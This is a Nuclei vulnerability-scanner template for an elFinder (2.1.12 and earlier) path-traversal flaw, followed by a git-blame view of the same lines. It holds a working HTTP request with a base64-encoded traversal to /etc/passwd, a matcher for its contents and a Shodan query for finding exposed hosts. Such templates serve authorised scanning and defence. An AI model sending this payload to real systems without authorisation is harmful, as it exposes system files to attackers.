nuclei-templates/http/vulnerabilities/other/elFinder-path-traversal.yaml

id: elFinder-path-traversal

info:
  name: elFinder  <=2.1.12 - Local File Inclusion
  author: ritikchaddha
  severity: high
  description: |
    elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
  reference:
    - https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"elfinder"
  tags: lfi,elfinder

http:
  - raw:
      - |
        GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

# digest: 490a0046304402207a84fa4d505ee01813aeca1abbfd4901a7910ca8abf6e6663cf90a67380b2b560220342914fbdc445692dcbfcaf2ce7f7df1984898f72d3101e9bea46f1c625e6ecc:922c64590222798bb761d5b6d8e72950
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`id: elFinder-path-traversal`

			`info:`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`name: elFinder <=2.1.12 - Local File Inclusion`
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`author: ritikchaddha`
			`severity: high`
			`description: \|`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`elFinder through 2.1.12 is vulnerable to local file inclusion via Connector.minimal.php in std42. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.`
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`reference:`
			`- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html`
Dashboard Content Enhancements (#4927) Dashboard Content Enhancements 2022-07-27 20:17:31 +00:00			`classification:`
			`cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N`
			`cvss-score: 7.5`
			`cwe-id: CWE-22`
templateman update 2023-10-14 11:27:55 +00:00			`metadata:`
			`verified: true`
			`max-request: 1`
			`shodan-query: title:"elfinder"`
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`tags: lfi,elfinder`

Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com> 2023-04-27 04:28:59 +00:00			`http:`
Create elFinder-path-traversal.yaml 2022-07-05 03:10:51 +00:00			`- raw:`
			`- \|`
			`GET /php/connector.minimal.php?cmd=file&target=l1_Li8vLi4vLy4uLy8uLi8vLi4vLy4uLy8uLi9ldGMvcGFzc3dk&download=1 HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`matchers-condition: and`
			`matchers:`
			`- type: regex`
			`regex:`
			`- "root:.*:0:0:"`

			`- type: status`
			`status:`
			`- 200`
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot: 2023-10-20 11:41:13 +00:00
			`# digest: 490a0046304402207a84fa4d505ee01813aeca1abbfd4901a7910ca8abf6e6663cf90a67380b2b560220342914fbdc445692dcbfcaf2ce7f7df1984898f72d3101e9bea46f1c625e6ecc:922c64590222798bb761d5b6d8e72950`